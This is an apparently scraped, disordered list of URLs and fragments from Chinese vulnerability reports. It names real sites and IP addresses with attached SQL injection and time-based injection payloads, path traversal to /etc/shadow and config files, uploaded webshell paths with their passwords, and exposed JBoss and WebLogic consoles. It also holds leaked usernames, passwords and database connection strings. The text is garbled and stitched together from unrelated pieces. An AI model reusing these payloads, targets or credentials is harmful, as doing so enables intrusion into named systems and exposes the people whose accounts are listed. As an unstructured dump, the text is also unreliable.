http://mail.jiashuangkuaizi.com http://0r1.me/jskz_mail.txt http://0r1.me/jskz_mail_result.txt http://pm.oyekeji.com/ http://0r1.me/zentao.txt http://**.**.**.**/jctk/shiji/List.aspx?funid=293&deptid=408 http://www.csfujob.com/tslx/cnt/counter.asp?user=znl http://**.**.**.**/ http://1.85.2.252:7002 http://1.85.2.252:7002/uddiexplorer/55ss.jsp http://jpk.scuec.edu.cn http://jpk.scuec.edu.cn http://w.aili.com http://www.homeinns.com/member/register# http://**.**.**.**/ http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**:7002/)存在Java反序列化漏洞,已经实现远程命令执行和Getshell。 http://**.**.**.**/cssroot.jsp http://**.**.**.**/memberInfoManagement/memberLogin.action 
http://**.**.**.**/经扫描发现开了3312端口,为Kangle虚拟主机管理系统,然后这个虚拟主机存在本地包含漏洞,利用过程如下: http://**.**.**.**:3312/vhost/index.php?c=../../../../../../../../../../../Program http://**.**.**.**/ http://**.**.**.**:8080/twy/login.action?username= http://www.scrcoabj.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.mtdd.ecnu.edu.cn/About.asp?ID=174 http://www.mtdd.ecnu.edu.cn/About.asp?ID=174%20%20union%20select%201,2,username,password,5,6%20from%20admin http://**.**.**.**/file_download.php?file_path=../config.php http://**.**.**.**/phpmyadmin/ http://vip.wissun.com/space/prohome/user_name/-1 http://202.108.103.193/ http://gpcr.ecnu.edu.cn/chakan.aspx?ContId=27 http://cjve.ecnu.edu.cn/center.aspx?id=5469b5f6-5982-4a2e-a1b3-2dd03603e225 http://beijing.zznissan.com.cn/admin/console/?c=login&a=log http://anhui.zznissan.com.cn/admin/console/?c=login&a=log http://chongqing.zznissan.com.cn/admin/console/?c=login&a=log http://civilian.zznissan.com.cn/admin/console/?c=login&a=log http://e.zznissan.com.cn/admin/console/?c=login&a=log http://fujian.zznissan.com.cn/admin/console/?c=login&a=log http://gansu.zznissan.com.cn/admin/console/?c=login&a=log http://guangdong.zznissan.com.cn/admin/console/?c=login&a=log http://guangxi.zznissan.com.cn/admin/console/?c=login&a=log http://guangzhou.zznissan.com.cn/admin/console/?c=login&a=log http://guizhou.zznissan.com.cn/admin/console/?c=login&a=log http://hainan.zznissan.com.cn/admin/console/?c=login&a=log http://hebei.zznissan.com.cn/admin/console/?c=login&a=log http://heilongjiang.zznissan.com.cn/admin/console/?c=login&a=log http://henan.zznissan.com.cn/admin/console/?c=login&a=log http://hubei.zznissan.com.cn/admin/console/?c=login&a=log http://hunan.zznissan.com.cn/admin/console/?c=login&a=log http://jiangsu.zznissan.com.cn/admin/console/?c=login&a=log http://jiangxi.zznissan.com.cn/admin/console/?c=login&a=log http://jilin.zznissan.com.cn/admin/console/?c=login&a=log http://liaoning.zznissan.com.cn/admin/console/?c=login&a=log 
http://neimenggu.zznissan.com.cn/admin/console/?c=login&a=log http://ningxia.zznissan.com.cn/admin/console/?c=login&a=log http://nv200.zznissan.com.cn/admin/console/?c=login&a=log http://patrol.zznissan.com.cn/admin/console/?c=login&a=log http://qinghai.zznissan.com.cn/admin/console/?c=login&a=log http://shandong.zznissan.com.cn/admin/console/?c=login&a=log http://shanghai.zznissan.com.cn/admin/console/?c=login&a=log http://shanxi.zznissan.com.cn/admin/console/?c=login&a=log http://sichuan.zznissan.com.cn/admin/console/?c=login&a=log http://spv.zznissan.com.cn/admin/console/?c=login&a=log http://sx.zznissan.com.cn/admin/console/?c=login&a=log http://tianjin.zznissan.com.cn/admin/console/?c=login&a=log http://zhejiang.zznissan.com.cn/admin/console/?c=login&a=log http://yunnan.zznissan.com.cn/admin/console/?c=login&a=log http://xizang.zznissan.com.cn/admin/console/?c=login&a=log http://xinjiang.zznissan.com.cn/admin/console/?c=login&a=log http://fujian.zznissan.com.cn http://218.16.100.212:8080/gionee/weibo/imeiManager!list无须登录可直接访问 http://csse.szu.edu.cn/zk/admin/signin http://**.**.**.**/show.asp?id=43 http://**.**.**.**/admin/admin_index.asp http://xxx.com/rock.php?a=loadinfor&m=userinfor&d=humanres&id=1&ajaxbool=true http://xxx.com/rock.php?a=getsysfilod&m=dir&d=system&ajaxbool=true http://xxx.com/rock.php?a=getfile&m=dir&d=system&ajaxbool=true http://xxx.com/rock.php?a=open&m=dir&d=system&ajaxbool=true&path=webrock/webrockConfig.php http://demo.rockoa.com/upload/2015-12/27_0202571895.jpg http://demo.rockoa.com/upload/2015-12/123.php,passwd:wooyun,请及时删除 http://demo.rockoa.com/重现 http://**.**.**.**/communion,看到有留言功能,就顺手丢了一个xss,过了几天登陆xss平台就收到了xss,明明绑定了邮箱却不通知。这个平台。。好吧说正题。来截张图 http://**.**.**.**/uploads/Dy/soft/151226/shell.php,http://**.**.**.**/include/taglib/test1.lib.php,密码都是shell,可以测试下 http://www.vzoom.com/vzoom/initIndex.action 
https://**.**.**.**/dalinhuang/ashural-asset/blob/5f9c2b9fbc001ba28519b3489c2cdab094ca610b/AutoVersion/ant-scripts/build-autoversion.xml http://**.**.**.**/ http://agt.ehuatai.com/Login.aspx http://**.**.**.**/erp/mqq/jsp/mqqjInfo.jsp?compId=A&projectNo=ZP12030074* http://**.**.**.**/info.asp?id=436 http://**.**.**.**/admin url:http://api.xiyou.cntv.cn/activity/lists?pid=100&format=json&type=web http://hk.dfzq.com.cn:82 http://hk.dfzq.com.cn:82/uddiexplorer/33ss.jsp http://hk.dfzq.com.cn:82/uddiexplorer/out.jsp http://10.254.1.31 http://10.254.1.28 http://10.254.1.26 http://10.254.1.61 http://10.254.1.51 http://10.254.1.50 http://10.254.1.34 http://10.254.1.111 http://10.254.1.104 http://**.**.**.**/simp/product_list.asp?type_id=2&product_id= http://**.**.**.**/simp/product_list.asp?type_id=1 https://**.**.**.**/index.php?_room=12&_action=detail&gallery_id=408 http://121.35.255.78:7001/mbp/login.jsp system:service=MainDeployer http://**.**.**.**/is.war http://www.hglx.sdu.edu.cn/article.php?id=764 http://www.dljx.ecnu.edu.cn/content.php?tid=2 http://222.18.15.135/jiuye/shownews.php?type_id=5&newsid=1 http://1.85.2.244/OC_Manager/ http://1.85.2.244/uddiexplorer/22ss.jsp jdbc:oracle:thin:@**.**.**.**:1521:orc1 http://bj.zufangzi.com/order/ownerEntrustController/toEntrust.do发布房源 http://**.**.**.**/ http://dl4.lib.tongji.edu.cn/search/showdetail.aspx?rsid=b4d52eca-087d-455b-9403-d37624f61146&docid=10136&title=%E4%B8%8A%E6%B5%B7%E6%8E%A8%E5%B9%BF%E7%94%B5%E5%8A%A8%E6%B1%BD%E8%BD%A6%E5%88%86%E6%97%B6%E7%A7%9F%E8%B5%81%E8%BF%90%E8%90%A5%E6%A8%A1%E5%BC%8F http://**.**.**.**/webcms/index!index.action http://**.**.**.** http://maila.faw.com.cn/ http://mail3.jf.faw.com.cn/ http://fawcustoms.faw.com.cn/system/login.jsp http://iecoa.faw.com.cn/ http://114.251.99.158/login.aspx http://114.251.99.158 http://**.**.**.**/ga/ http://115.231.106.245:9200/ http://www.bufsun.com http://**.**.**.** https://221.231.143.159 www.njzq.com.cn 
http://**.**.**.**/kjc_notice/main_readnotice.asp?id=8a8889a0504ad14d01516bab606c584e http://**.**.**.**/的子站。 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://project.kuxun.cn:8080 https://mail.tuniu.com/owa/ https://218.94.7.120/prx/000/http/localhost/login http://219.141.188.21:8088/inter?active=inter# http://sys.cashchina.cn/ http://risk.cashchina.cn/ http://fin.cashchina.cn/ http://sys.cashchina.cn/GetPassword/Find.aspx http://**.**.**.**/beian/tongji/rep_hangqing.aspx?year=&month=12&day=26 http://d.huxiu.com/ http://kf.shengli.com/search/index/keyword/23*/p/2.html http://123.125.112.41/dfshealth.html#tab-overview http://passport.chinahr.com/pc/findPwd http://58.249.117.85:8080/portal/pages/index.jsp http://202.108.103.193:9003/ http://202.108.103.193:9001/index.jsp http://202.108.103.193:9002/index.jsp http://202.108.103.193:9003/admin-console/login.seam?conversationId=26 http://202.108.103.193:9003/ma/ma3.jsp http://202.108.103.193:9003/jmx-console/ http://202.108.103.193:9003/invoker/JMXInvokerServlet http://219.146.73.92:7003/ http://219.146.73.92:7003/uddiexplorer/33ss.jsp http://219.146.73.92:7003/uddiexplorer/out.jsp http://114.242.218.150/ http://114.242.218.150/uddiexplorer/ss.jsp http://edu.shangdu.com/ikaimi/showajax.php?id=231705 http://www.baopal.com:7001/jmx-console/ http://www.baopal.com:7001/invoker/JMXInvokerServlet system:type=ServerInfo http://www.baopal.com:7001/invoker/JMXInvokerServlet system:service=MainDeployer http://www.XXOO.cn/js/test.war http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp http://**.**.**.**/jmclove/index.php/news/detail/id/438* jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=jacbus http://**.**.**.**:7001/portal/homePage.jsp http://**.**.**.**:8081/ a855:6cdb:8d11:2566%11 pw:pa55w0rd http://**.**.**.**/ http://**.**.**.**/sd1114820/member_pm.php http://**.**.**.**//uploads/allimg/151227/1_1845492081.php 
http://**.**.**.**/Default.aspx?ScriptManager1_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjE1MDYwMzRkZAjLSPQnTGBSgRpVHH5Qps6VXZMs&tbUserN=1111&tbPassW=11111&btnOK=%E7%99%BB%E5%BD%95&__EVENTVALIDATION=%2FwEWBgLziPOXAgKK%2FdqNAwKcnri7CQLdkpmPAQKEk6mOAQKLk6mvAiiJLXwVnpmfTrFvgKW8E%2FpkCOhO http://211.147.87.211:7002/ http://211.147.87.211/login.aspx http://211.147.87.211:7002/uddiexplorer/ss.jsp http://211.147.87.211:7002/uddiexplorer/out.jsp http://dzp.e23.cn C535F5327C233C473E3E501614565299:FG=1 http://110.e23.cn http://**.**.**.**/ http://**.**.**.**/cw/skin1/jsp/download.jsp?file=../../../../etc/shadow http://**.**.**.**/)存在SQL注入、后台未授权访问、多处XSS漏洞。 http://exam.kingdee.com/mana/edit/attach_upload.jsp http://122.193.9.66 http://www.1gw.com http://**.**.**.**/information.php?InfoID=1963 http://**.**.**.**/webmail/index.php?module=view&action=login f55b:b469:4fd6:3c9c%20 ab4a:6471:d6f6%15 fc17:1831:5720:3a84%13 c058:6301::c058:6301 http://member.bilibili.com/#gl_manage http://cms.php.administrator.cctvmall.com http://114.242.218.117:8088/ http://114.242.218.117:8088/uddiexplorer/22ss.jsp http://114.242.218.117:8088/uddiexplorer/out.jsp http://400.fang.com/dongtao.php?city=bj&newcode=123&type=dong http://**.**.**.**/ShowFunction.aspx?fybm=51 http://221.8.57.110/i-card/getCardVersionAction.action http://221.8.57.110/uddiexplorer/44ss.jsp http://221.8.57.110/uddiexplorer/out.jsp pwd:Wooyun123 http://113.108.182.3:19244 http://**.**.**.**:8019 http://**.**.**.**:8019/SLClient.aspx?id=83b82137-76ef-402c-b204-0c6b37563020 http://go.sogou.com/hotel/WEB-INF/web.xml http://go.sogou.com/zt/WEB-INF/web.xml http://go.sogou.com/tejia/WEB-INF/web.xml http://go.sogou.com/plane/WEB-INF/web.xml http://**.**.**.**:8081//tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://jj.youc.com http://117.34.12.17/manage/logon.jsp http://zbn.e23.cn http://**.**.**.**/shop/admin/login.jhtml http://zz.youc.com http://**.**.**.** 
http://**.**.**.**/pro_info.php?rid=653 http://113.108.182.3:22580/login.jsp http://**.**.**.**/index.php?act=member&op=address&type=edit&id=218 http://www.shwnjxc.com:84 http://**.**.**.** http://www.myfund.com/apptuiuguang/myfundindex.html http://app.myfund.com:8484/Service/DemoService.svc/GetUserInfo?UserName=18888888888& http://app.myfund.com:8484/Service/DemoService.svc/GetUserInfo?UserName=liyan& http://**.**.**.**/ http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1 http://**.**.**.**/ https://117.39.30.5/por/login_psw.csp?rnd=0.7774858681950718 http://www.fengyunlive.com/play/ http://www.fengyunlive.com/play/manager/playinfo?cid= http://www.fengyunlive.com/channel-list http://www.fengyunlive.com/tv/236_1375092311246.htm http://www.fengyunlive.com/play/manager/playinfo?cid=236_1375092311246 http://act.wildstar.ztgame.com/database http://act.wildstar.ztgame.com/sign/addsign.php?callback=jQuery172042374535487033427_1451238002410&zt_account=998&_=1451238039075 http://222.90.136.116:8080//jmx-console/ http://222.90.136.116:8080//invoker/JMXInvokerServlet http://www.njude.com.cn/xc/s_dist.asp?id=7368585&type=a http://gksx.free.ezvpn.cn:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 https://**.**.**.**/findpwd.aspx http://**.**.**.**/KCMS/detail/detail.aspx?filename=1011088096.nh&dbcode=CMFD&dbname=CMFD2011 http://**.**.**.**:801/upLoad/users/51463/Papers/2014-12/201412191442379833.docx http://www.zhihuiya.com/.git/config http://www.patsnapglobal.com/.git/config ssh://git@code.patsnap.com:5822/inno/company-website.git http://news.patsnap.com/app.zip http://analytics.patsnap.com/ http://analytics.patsnap.com/ http://221.224.11.234:8888/aaaaaaa http://221.224.11.234:28780/ http://221.224.11.234:28780/repositories/ http://insights.patsnap.com/ http://insights.patsnap.com/create http://221.224.11.234:8888/test.php http://testlink.patsnap.com/ http://t.patsnap.com/ http://data.patsnap.com/ 
file:/opt/jetty/work/jetty-0.0.0.0-8080-data-api.war-_data-api-any-/webapp/,AVAILABLE}{/data-api.war file:/opt/jetty/work/jetty-0.0.0.0-8080-machine-translation-api.war-_machine-translation-api-any-/webapp/,AVAILABLE}{/machine-translation-api.war file:/opt/jetty/work/jetty-0.0.0.0-8080-search-api.war-_search-api-any-/webapp/,AVAILABLE}{/search-api.war http://export.patsnap.com/ file:/tmp/jetty-0.0.0.0-8080-export-service-Rel.3.0.12.war-_export-service-Rel.3.0.12-any-5022217990294658891.dir/webapp/,AVAILABLE}{/export-service-Rel.3.0.12.war https://github.com/ieiayaobb/fluidOS/blob/e5755d5f3ccd2c1af4629474568476add5b28b4c/fluidos-service/src/main/resources/git.properties code.patsnap.com/patsnap-services/storage.git http://**.**.**.**/bugs/wooyun-2010-0128322 http://www.chanhen.com:801//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://114.80.122.212:8080/jenkins/ https://github.com/blackye/Jenkins User:zengxiaomin Password:123456 User:wangqian Password:wangqian123 http://218.5.65.218:8080/ redis_version:2.1.4 redis_git_sha1:00000000 multiplexing_api:winsock2 process_id:4788 uptime_in_seconds:470 lru_clock:425121 used_cpu_sys:0.02 used_cpu_user:0.08 used_cpu_sys_childrens:0.00 used_cpu_user_childrens:0.00 used_memory:425972 used_memory_human:415.99K mem_fragmentation_ratio:0.00 last_save_time:1451285625 hash_max_zipmap_value:512 role:master db0:keys=2,expires=0 http://**.**.**.**/index.php?s=/mba/index/search.html http://202.102.251.187:8090/admin/login.web存在Struts2命令执行漏洞,最终拿到服务器shell。 http://**.**.**.** http://store.ticwear.com/pages/info https://github.com/yb989/infcenter/blob/872d63dbd49b54aced249fc0eb9cd20ef24d6ca7/new_infcenter/.svn/pristine/80/8085974cb049d6c9438e59c0a773c321b11e7f08.svn-base https://**.**.**.**/main.php?id=279&lan=c http://channel.360.cn/frontnotice/list?list_id=1 http://222.247.38.221/admin/login_login.action http://**.**.**.**/pingyi/zmhd_ht/bm_login.aspx http://tg.youc.com/index.php?r=wowka-nvshen 
http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629” http://www.sydoil.com/services_detail.asp?id=1629” http://www.sydoil.com/services_detail.asp?id=1629” http://fenrunv2.dld.com/admin/login/login http://my.fund123.cn http://av.youc.com http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/index/index.action由于struts2漏洞,导致网站getshell。 http://hr.cnht.com.cn:11000/ehr/login.jspa http://hr.cnht.com.cn:9090/ http://zxbx.cnht.com.cn:8956/ http://oa.cnht.com.cn:9060/login.jsp;jsessionid=C3A85107580B1557E64AB050E69320F2 http://oa.cnht.com.cn:9050/ http://email.cnht.com.cn:8686/ http://zxbx.cnht.com.cn:19080/zxbx/index.jsp http://oa.cnht.com.cn:9050/ http://hcm.yonyou.com http://**.**.**.** http://**.**.**.**/news_intro.aspx?news_id=549&fatherid=261 http://**.**.**.**/ecdomain/framework/RHIN_health/index.jsp http://pay.th010.com/ http://feedback.wps.cn/client http://202.104.30.94 http://202.104.30.94/she11.jsp?o=vLogin http://oa.cnht.com.cn:9060/ http://**.**.**.**/ http://**.**.**.**/doc/info/index.php?cata=11010 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ https://**.**.**.**/grrey/thinglinx_node_console/blob/7d6ad5e9c9fd189b95ea1dead5672dbe827c6b4b/thinglinx.config.js ASSERT:galaxyl9t http://**.**.**.**/web.zip http://ad.easou.com/ http://**.**.**.**/qtcpInfo.jsp?id=6 http://**.**.**.**/syadmin/login.aspx http://**.**.**.**/companyInfo!login.action https://**.**.**.**/satanfire/project/blob/c3174fe857f2a6c68d61291c5402fbcc29f6276a/front/iDSP-frontend-adx/src/main/resources/mail.properties http://h5.cmge.com/cmge_wap/indexWap!search?keyword=e http://gksx.free.ezvpn.cn:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**/ResLib/register/login.aspx http://lbtest.byd.com.cn/DMS_TEST/ http://219.134.188.39/DMS_TEST/ http://219.134.188.39/uddiexplorer/55ss.jsp 
http://lbtest.byd.com.cn/uddiexplorer/55ss.jsp jdbc:oracle:thin:@**.**.**.**:1521:testdb3 http://elite.aviva-cofco.com.cn/aclec/carouselFigure/findEcPic.do http://sales.aviva-cofco.com.cn/online/discount/discount.do http://sales.aviva-cofco.com.cn:9080/mobile/policyManage/callPrem.do http://elite.aviva-cofco.com.cn/aclec/cssroot.jsp?o=vLogin http://wooyun.org/bugs/wooyun-2015-0164282 http://61.163.100.203:8080 http://**.**.**.**/ https://github.com/zth390872451/java/blob/a56fd1edcd14a5b80812ed689f0ded2da9ec3eec/Platform/conf/cc.mail/.svn/text-base/beauty.properties.svn-base http://wh.chinac.com/user_toLogin.html http://**.**.**.**/ http://**.**.**.** https://github.com/xienan89/test-projects/blob/1762c0760647aa2ffe5f847261362c20118bb88a/just-for-test2/src/main/java/com/xienan/mail/Mail.java http://**.**.**.**/ http://**.**.**.** http://library.ouc.edu.cn/Result.aspx http://e-learning.qzccbank.com/lds/sys_logout.do http://cloud.ouc.edu.cn/graduEnroll/index.php?title=%E9%A6%96%E9%A1%B5 http://www.qianxs.com http://**.**.**.**/manager/ItemList.aspx http://**.**.**.**/ http://**.**.**.**/?app=member.member&act=lostp1 http://61.147.80.119/dadi/ http://61.147.80.119/dadi/she11.jsp?o=vLogin http://**.**.**.** http://180.213.5.16:7003/sunLifeConsole/ http://youth.sicnu.edu.cn/stuol/mail.php?do=browse&id=4169 http://www.doyouhike.net/group/group_list/?style=-1 http://**.**.**.**/about/company/intro/default.aspx,如图所示: http://**.**.**.**:8080/oaweb/,如图所示: http://400.track.yingxiong.com/index.do http://61.187.87.92:7001/duizhang/she22.jsp http://222.168.65.208/login.jsp http://hoo.koofang.com https://**.**.**.**/login.aspx http://**.**.**.**/couponwine.aspx?key=1 http://**.**.**.**/integral.aspx?key=1 http://**.**.**.**/cash.aspx?key=1 http://**.**.**.**/coupon.aspx?key=1 http://**.**.**.**/couponwine.aspx?key=1';WAITFOR http://**.**.**.**/couponwine.aspx?key=1';WAITFOR http://**.**.**.**/couponwine.aspx?key=1';WAITFOR https://222.249.130.131/prx/000/http/localhost/login 
http://euniv.zte.com.cn/ http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/viewnews.asp?id=4540 http://**.**.**.**/admin/denglu.htm http://a6.gykghn.com:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://game.sports.sina.com.cn/chaoti_events/wyx_2015_christmas_event/deal.php http://test.com/?http://game.sports.sina.com.cn/chaoti_events/wyx_2015_christmas_event/ http://game.weibo.com/avatar/interface/shareWeibo http://game.weibo.com.test.com/avatar/home/?origin=2182 http://game.weibo.com/avatar/events/shareTaskWeibo http://test.com/?http://game.weibo.com/avatar/home/?origin=2182 http://dr.wenwo.com/popular/indexActivityshare http://dr.wenwo.com/popular/indexActivityshare http://test.com http://58.56.60.68:8088/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**/ http://**.**.**.**/product.php?cat=11&id=22 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/setup/DBManage.aspx https://ticket.wuhan.wandamoviepark.com/LogIn/Index https://ticket.wuhan.wandamoviepark.com/LogIn/getLoginCode jdbc:oracle:thin:@**.**.**.**:1521:tstdbs http://**.**.**.**:80/ http://www.doyouhike.net/forum/globe/2334245,0,0,0.html www.doyouhike.net http://www.doyouhike.net http://**.**.**.**/ http://**.**.**.**:8080/ees/test.jsp http://**.**.**.**/ http://**.**.**.**/main/adminindex.jsp http://**.**.**.**/download/ 
http://**.**.**.**/download/1038832014-07-24164916.csv http://**.**.**.**/ http://www.allinpay.com/httpHandler.php?Handler.Default.SendSpecialMerchants http://**.**.**.**/一个分站在内网的 http://**.**.**.**/userfiles/遍历目录发现小马 http://**.**.**.**/userfiles/1.asp;.jpg根据这个可以得到另个小马mima http://**.**.**.**/userfiles/1.asp http://**.**.**.**:7001/defaultroot/desktop.jsp# http://**.**.**.**/ http://**.**.**.**/api/users/1/followings www.doyouhike.net http://www.doyouhike.net http://www.leadong.com/order-detail.html?orderId=RpAfUKfpAIaj http://www.ztekj.com/login.jsp登录页面上发现了一个POST型注入。就是下面的type参数。 http://www.ztekj.com/login.jsp http://**.**.**.**/ http://**.**.**.**:8060/ http://wooyun.org/bugs/wooyun-2010-0164690 http://**.**.**.**:7002/ http://onesdk.baidu-mgame.com/onesdk/ http://jk.qianxs.com相似存在openssl的系统 http://210.14.78.153/ http://opinion.e23.cn/hot?k=1 http://**.**.**.**/f-0-IHY_MLU_S4J_KDL_58V-0-0.html?sort=3#ref=all&po=guide_kw000 http://**.**.**.**/bugs/wooyun-2015-0131701) https://github.com/qict777/oscarhhb/blob/master/getip.py http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775 http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775/*!and*/1=1 http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775/*!and*/1=11 http://oauth.tops001.com http://oa.sinopharm.com/seeyon/ http://oa.sinopharm.com/seeyon/management/index.jsp http://oa.sinopharm.com/seeyon/logs/login.log https://**.**.**.**/nthuad.php?pid=402 http://www.jxlife.com.cn/cssroot.jsp http://sales.jxlife.com.cn/cssroot.jsp http://wap.jxlife.com.cn/cssroot.jsp http://service.jxlife.com.cn/cssroot.jsp http://www.jxlife.com.cn/clauseManage/query.do http://sales.jxlife.com.cn/customer/createImage.do http://wap.jxlife.com.cn/mobilePolicy/insuredEntry.do http://service.jxlife.com.cn/customer/createImage.do http://zhidao.baidu.com/question/137190521709533965 http://home.1905.com/robots.txt/.php http://home.1905.com/attachment/201512/18/4580762_1450417652l9ad.jpg/.php 
http://sso.haier.net/cas/login http://sso.haier.net http://**.**.**.**/ http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**/login.jsp https://github.com/torry999/lingshi/blob/ac628f6cb16697defe2be524254b6b6b97bcc26b/Application/Common/Common/function.php http://**.**.**.**:7003/ccsbweb/login.jsp),IP地址是:**.**.**.**,系统由四川久远银海软件股份有限公司开发,该存在Java反序列化漏洞(已实现上传/远程命令执行)。 http://**.**.**.** https://mp.weixin.qq.com/ https://mp.weixin.qq.com/cgi-bin/home?t=home/index&lang=zh_CN&token=1063348626 http://sync.meizu.com:80/download/etc/passwd http://sync.meizu.com:80/download/etc/shadow GmQ0:1***** https://github.com/andaok/python/blob/9c21f8cdaa4cc4d5b25356ff18af953ee197c3c9/mod/mod_email/SendMail.py https://github.com/AntDream/cchome/blob/b8920304736660db28b33ae3c2c1b8a86124a7ca/admin/src/main/resources/init.properties jdbc:mysql://559d09f7c9dd7.gz.cdb.myqcloud.com:18059/cchome?useUnicode=true&characterEncoding=utf-8 jdbc:mysql://127.0.0.1:3306/cchome?useUnicode=true&characterEncoding=utf-8 jdbc:mysql://120.132.51.188:2101/msds_zc?createDatabaseIfNotExist=true&useUnicode=true&characterEncoding=utf-8&autoReconnect=true http://www.doyouhike.net/user/3/visited http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/nulltest.jsp http://**.**.**.**/login.action http://**.**.**.**/admin/teacher/file/down.php?filename=../../include/config.php http://**.**.**.**/ http://ski-ana.nwpu.edu.cn/ http://**.**.**.**/uploads/ https://github.com/MarkWh1te/Mytest/blob/66f8c9b3376be94b2dcb3f5b576ada88d8109b0d/fun/test.py http://**.**.**.**/index.php?s=/admin http://**.**.**.**/tw/products.php?Main_ID=2&Sec_ID=0 http://**.**.**.**/index.php?s=/Home/User/login.html http://oa.gykgnmg.com/yyoa/ http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=productlist http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=orderdetail&oid=1444183622 http://wooyun.org/bugs/wooyun-2010-0164337 
https://123.103.6.250 http://172.18.4.208:8080/ http://172.18.4.70:8080/script http://172.18.2.108:8080/script http://172.18.4.145:8080/ http://172.18.4.169:8080/ http://172.18.4.210:8080/ http://172.18.4.212:8080/ http://172.18.4.214:8080/ http://172.18.4.216:8080/script http://172.18.24.62:8081/nexus http://rundeckinteali.ops.chanjet.com.cn http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_imp/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_mobile/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_web/ dcff:6198%14 da2:bc8a:af97:6f59%13 http://**.**.**.**/news/Hodel/UserData.ashx?UserNameJtl=1 https://222.73.60.3 ftp:oracle/oracle telnet:oracle/oracle http://www.doyouhike.net/dest/tongling-wuhuashan-cycling#routeCmtBox http://www.doyouhike.net/dest/songshanhuhuanhu-cycling http://www.doyouhike.net/dest/guangzhouyingguxian-hiking URL:https://**.**.**.**/ https://**.**.**.**/essframe http://loan.tops001.com/ http://oauth.tops001.com/Login.html进行身份验证。 http://oauth.tops001.com/Login.html可撞库。用常用用户名和弱口令123456可获得一些账号。 https://**.**.**.**/liuli1735/workspace/blob/df8b94aa7821173fcbaa79f4a862696130dd3342/R/.Rhistory uuid:o79Eh4KdajO6cBuOs04OgQ\=\= uuid:RXFFr8vKQJmR7j0ikc070A\=\= uuid:MrtE1M1qBKUWnr4diT95Wg\=\= uuid:1kFLXf1tdSSivMydoZsfLQ\=\= uuid:MrtE1M1qBKUWnr4diT95Wg\=\= uuid:e8VJSGK71Z/Fr5neiVfsAw\=\= BLOWFISH:EC049C62E1D2C5435654493D uuid:1kFLXf1tdSSivMydoZsfLQ\=\= uuid:RXFFr8vKQJmR7j0ikc070A\=\= http://**.**.**.**:8088/cas/login?service=http%3A%2F%2F**.**.**.**%2Findex.jsp https://github.com/mrwangx/rwgl/blob/14e61a97ffc22ef5ddf701cd50dc956c6e318e3f/routes/mail.js http://**.**.**.**/CMS/Default.aspx https://github.com/chaletli2014/rhinocort/blob/cb9e1e7c7aed34cf2b3d19d0ff384f840ec501b5/WebContent/WEB-INF/config/system.properties email_pwd:Sd123456 
